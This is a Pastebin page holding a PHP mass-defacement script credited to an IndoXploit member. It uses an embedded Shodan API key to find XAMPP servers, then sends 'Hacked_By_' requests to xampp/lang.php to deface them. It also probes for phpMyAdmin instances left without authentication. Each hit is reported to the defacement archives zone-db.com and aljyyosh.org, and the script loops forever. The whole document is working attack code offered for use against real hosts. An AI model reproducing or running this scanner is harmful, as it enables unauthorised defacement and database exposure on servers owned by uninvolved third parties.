Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- set_time_limit(0);
- date_default_timezone_set('asia/jakarta');
- shor7cut_scanner();
- /* ------- FUNGSI AMBIL DATA TARGET DAN EKSEKUSI -----*/
- function shor7cut_scanner(){
- /* ------- CONFIG -----*/
- $api_key="z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
- $nama_hacker="Shor7cut";
- $nama_team="IndoXploit";
- $nama_file_target = "target-bu7sec.txt";
- $nama_laporan="Laporan.txt";
- unlink($nama_file_target);
- $nama_ouput_result_xampp="BUG7SEC-XAMPP.HTML"; // Gunakan TYPE FILE (*.HTML)
- $nama_ouput_result_phpmyadmin="BUG7SEC-PHPMYD.HTML"; // Gunakan TYPE FILE (*.HTML)
- $nama_log_xampp_lang="xampp.log7sec"; // AGAR TIDAK MENYIMPAN DATA YANG SAMA // gunakan .log7sec saja
- $nama_log_xampp_phpmyadmin="phpmyadmin.log7sec"; // AGAR TIDAK MENYIMPAN DATA YANG SAMA // gunakan .log7sec saja
- $conf_irm = "TRUE"; // TRUE or FALSE (Jika Sudah diisi semua conf , silahkan ganti menjadi TRUE)
- $versi_php = phpversion();
- $no=1;
- $no_target=1;
- $total_target=0;
- $total_xampp_vuln=0;
- $total_phpmyadmin_vuln=0;
- $waktu_start=date("d-m-Y h:i:sa");
- /* ------- CONFIG:END -----*/
- $logos.="\r\n------------------------------------------------------------\r\n";
- $logos.=" _________.__ _________ __ \r\n";
- $logos.=" / _____/| |__ __________\______ \ ____ __ ___/ |_ \r\n";
- $logos.=" \_____ \ | | \ / _ \_ __ \ / // ___\| | \ __\ \r\n";
- $logos.=" / \| Y ( <_> ) | \/ / /\ \___| | /| | \r\n";
- $logos.=" /_______ /|___| /\____/|__| /____/ \___ >____/ |__| \r\n";
- $logos.=" \/ \/ [ MULTY K.I.L.L.E.R ] \/ \r\n";
- $logos.="-------------------------------------------------------------\r\n";
- echo $logos;
- if($conf_irm=="FALSE"){
- echo "[PERINGATAN] -> Ops.. Config error\r\n";
- exit();
- }
- if($versi_php<="5.3.0"){
- echo "Ops... Silahkan Upgrade versi PHP anda.\r\n";
- exit();
- }
- $dork = array (
- 'xampp',
- 'xampp Apache/2.2.3',
- 'xampp Apache/2.2.4',
- 'xampp Apache/2.2.6',
- 'xampp Apache/2.2.8',
- 'xampp Apache/2.2.9',
- 'xampp Apache/2.2.11',
- 'xampp Apache/2.2.12',
- 'xampp Apache/2.2.14',
- 'xampp Apache/2.2.17',
- 'xampp Apache/2.2.21',
- 'xampp Apache/2.4.2',
- 'xampp Apache/2.4.3',
- 'xampp Apache/2.4.10',
- 'xampp Apache/2.4.12',
- 'xampp PHP/5.2.1',
- 'xampp PHP/5.2.2',
- 'xampp PHP/5.2.3',
- 'xampp PHP/5.2.4',
- 'xampp PHP/5.2.5',
- 'xampp PHP/5.2.6',
- 'xampp PHP/5.2.8',
- 'xampp PHP/5.2.9',
- 'xampp PHP/5.3.0',
- 'xampp PHP/5.3.1',
- 'xampp PHP/5.3.5',
- 'xampp PHP/5.3.8',
- 'xampp PHP/5.4.4',
- 'xampp PHP/5.4.7',
- 'xampp PHP/5.4.31',
- 'xampp PHP/5.5.15',
- 'xampp PHP/5.5.19',
- 'xampp PHP/5.6.3',
- 'xampp PHP/5.5.24',
- 'xampp PHP/5.6.8',
- 'xampp PHP/4.4.5',
- 'xampp PHP/4.4.6',
- 'xampp PHP/4.4.7',
- 'xampp PHP/4.4.8',
- 'xampp PHP/4.4.9'
- ); $total_dork = count($dork);
- echo proses("halaman_depan");
- $get = file_get_contents("https://api.shodan.io/account/profile?key={$api_key}");
- $json = json_decode($get,true);
- echo proses("halaman_info");
- $status_akun .="--------------------------------\r\n";
- $status_akun .="-> Nama : ".$json['display_name']."\r\n";
- $status_akun .="-> SALDO : ".$json['credits']."\r\n";
- $status_akun .="-> INFO : ".count($dork)." DORK\r\n";
- $status_akun .="--------------------------------\r\n";
- echo $status_akun;
- echo proses("mencari_target");
- /* MENCARI TARGET DAN MENYIMPAN TARGET*/
- foreach ($dork as $dorks) {
- $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api_key}&query={$dorks}");
- $json = json_decode($get,true);
- $target_live = $json['total'];
- foreach ($json['matches'] as $key => $value) {
- $fp = fopen($nama_file_target, 'a+');
- fwrite($fp, $value['ip_str']."|");
- fclose($fp);
- }
- if($target_live>100){
- $target_live=100;
- }
- $total_target=$target_live+$total_target;
- echo "[CARI TARGET] -> $no of $total_dork [Live Target : $target_live | Total Target : $total_target]\r\n";
- $no++;
- }
- echo "[INFO] Total Target : $total_target\r\n";
- /* MENGEKSEKUSI TARGET*/
- echo proses("loading_target");
- $buka_file = fopen($nama_file_target, "r");
- $baca_file = fgets($buka_file);
- $target = explode("|", $baca_file);
- echo proses("loading_eksekusi");
- foreach ($target as $sites) {
- $format_url_1 = "$sites/xampp/lang.php?Hacked_By_$nama_hacker";
- $format_url_2 = "$sites/security/lang.php?Hacked_By_$nama_hacker";
- $patch_result1 = "$sites/xampp/lang.tmp?";
- $patch_result2 = "$sites/security/lang.tmp?";
- $phpmyadmin_url = "$sites/phpmyadmin/querywindow.php";
- $curl_xampp_1 = curl_init($format_url_1);
- curl_setopt($curl_xampp_1, CURLOPT_FAILONERROR, true);
- curl_setopt($curl_xampp_1, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($curl_xampp_1, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl_xampp_1, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($curl_xampp_1, CURLOPT_TIMEOUT, 30);
- $result_xampp_1 = curl_exec($curl_xampp_1);
- $curl_xampp_2 = curl_init($format_url_1);
- curl_setopt($curl_xampp_2, CURLOPT_FAILONERROR, true);
- curl_setopt($curl_xampp_2, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($curl_xampp_2, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl_xampp_2, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($curl_xampp_2, CURLOPT_TIMEOUT, 30);
- $result_xampp_2 = curl_exec($curl_xampp_2);
- $phpmyn = curl_init("$phpmyadmin_url");
- curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
- curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
- $phpmynresult = curl_exec($phpmyn);
- echo "[Scan Target]-> TARGET : $sites <$no_target/$total_target>\r\n";
- if(eregi("Hacked_By_",$result_xampp_1))
- {
- echo "[Scan Target]-> XAMPP : vulnerability | xampp/lang.tmp\r\n";
- echo $phpmyadmin_status;
- echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result1,$nama_hacker,$nama_team);
- echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
- $total_xampp_vuln++;
- }
- else if(eregi("Hacked_By_",$result_xampp_2))
- {
- echo "[Scan Target]-> XAMPP : vulnerability | security/lang.tmp\r\n";
- echo $phpmyadmin_status;
- echo "[Scan Target]-> MIRROR : ".submit_mirror($patch_result2,$nama_hacker,$nama_team);
- echo "[Scan Target]-> Database : ".simpan_result_xampp($patch_result2,$nama_ouput_result_xampp,$nama_log_xampp_lang);
- $total_xampp_vuln++;
- }else {
- echo $phpmyadmin_status;
- echo "[Scan Target]-> XAMPP : Not vulnerability\r\n";
- }
- $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
- if(preg_match($re, $phpmynresult, $matches)){
- if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
- echo "[Scan Target]->PhpMyadmin : Not vulnerable (Auth)\r\n\n";
- }else {
- echo "[Scan Target]->PhpMyadmin : vulnerable\r\n";
- echo "[Scan Target]->PhpMyadminDB : ".simpan_result_phpmyadmin($phpmyadmin_url,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin);
- $total_phpmyadmin_vuln++;
- }
- }else {
- echo "[Scan Target]->PhpMyadmin : Not vulnerable\r\n\n";
- }
- flush();
- ob_flush();
- sleep(2);
- $no_target++;
- }
- $lapor.="\r\n\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
- $lapor.="-> SCAN START - END : ".$waktu_start."/".date("d-m-Y h:i:sa")."\r\n";
- $lapor.="-> Total Target : ".$total_target."\r\n";
- $lapor.="-> Total Xampp Vuln : ".$total_xampp_vuln."\r\n";
- $lapor.="-> Total PHPMYADMIN Vuln : ".$total_phpmyadmin_vuln."\r\n";
- $lapor.="\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";
- $fp = fopen($nama_laporan, 'a+');
- fwrite($fp, $lapor);
- fclose($fp);
- reload(); // reload senjata
- } /* AKHIR FUNGSI*/
- function reload(){
- shor7cut_scanner();
- }
- function submit_mirror($sites,$nama_hacker,$nama_team){
- $url = "http://$sites";
- $post = array(
- "hacker" => "$nama_hacker",
- "team" => "$nama_team",
- "url" => "$url",
- "poc" => "Other Web Application Bug",
- "key" => "kucing",
- "secret" => "tai",
- );
- $cubits = curl_init ("http://zone-db.com/notify_act.php");
- curl_setopt($cubits, CURLOPT_HEADER, 1);
- curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($cubits,CURLOPT_TIMEOUT,10);
- curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
- curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
- curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
- curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
- $result_mirror = curl_exec($cubits);
- if (preg_match("#added#is", $result_mirror)){
- $status_zonedb.= "Zone-DB [OK] | ";
- }else{
- $status_zonedb.= "Zone-DB [FAIL] | ";
- }
- $cubit = curl_init ();
- curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($cubit, CURLOPT_POST, 1);
- curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
- curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
- curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$nama_hacker&site=$url&how=1&why=1&addsite=Send");
- if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
- $status_zonedb.= "Aljyyosh [OK]\r\n";
- }else {
- $status_zonedb.= "Aljyyosh [Fail]\r\n";
- }
- return $status_zonedb;
- }
- function simpan_result_xampp($sites,$nama_ouput_result_xampp,$nama_log_xampp_lang){
- $buka_log_xampp = file_get_contents($nama_log_xampp_lang);
- $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
- $hasil_log = "http://".$sites."\r\n";
- if(!eregi($sites, $buka_log_xampp)){
- // simpan hasil result
- $fp = fopen($nama_ouput_result_xampp, 'a+');
- fwrite($fp, $hasil);
- fclose($fp);
- // simpan hasil ke log
- $fp = fopen($nama_log_xampp_lang, 'a+');
- fwrite($fp, $hasil_log);
- fclose($fp);
- $status_simpan.="Telah Disimpan\r\n";
- }else {
- $status_simpan="Tidak Tersimpan\r\n";
- }
- return $status_simpan;
- }
- function simpan_result_phpmyadmin($sites,$nama_ouput_result_phpmyadmin,$nama_log_xampp_phpmyadmin){
- $buka_log_xampp = file_get_contents($nama_log_xampp_phpmyadmin);
- $hasil = '<a href="http://'.$sites.'" target="_blank">'.$sites.'</a><br>';
- $hasil_log = "http://".$sites."\r\n";
- if(!eregi($sites, $buka_log_xampp)){
- // simpan hasil result
- $fp = fopen($nama_ouput_result_phpmyadmin, 'a+');
- fwrite($fp, $hasil);
- fclose($fp);
- // simpan hasil ke log
- $fp = fopen($nama_log_xampp_phpmyadmin, 'a+');
- fwrite($fp, $hasil_log);
- fclose($fp);
- $status_simpan="Telah Disimpan\r\n\n";
- }else {
- $status_simpan="Tidak Tersimpan\r\n\n";
- }
- return $status_simpan;
- }
- function proses($status){
- switch ($status) {
- case 'mencari_target':
- echo "INFO-> Mencari Target ";
- for ($i=0; $i <3; $i++) {
- echo ".";
- sleep(1);
- }
- echo "\r\n\n";
- break;
- case 'halaman_depan':
- echo "INFO-> Mohon menunggu ";
- for ($i=0; $i <3; $i++) {
- echo ".";
- sleep(1);
- }
- echo "\r\n";
- break;
- case 'halaman_info':
- echo "INFO-> Mengambil data API ";
- for ($i=0; $i <3; $i++) {
- echo ".";
- sleep(1);
- }
- echo "\r\n";
- break;
- case 'loading_target':
- echo "INFO-> Memuat Target ";
- for ($i=0; $i <3; $i++) {
- echo ".";
- sleep(1);
- }
- echo "\r\n";
- break;
- case 'loading_eksekusi':
- echo "INFO-> Mulai mengeksekusi Target ";
- for ($i=0; $i <3; $i++) {
- echo ".";
- sleep(1);
- }
- echo "\r\n\n";
- break;
- default:
- # code...
- break;
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement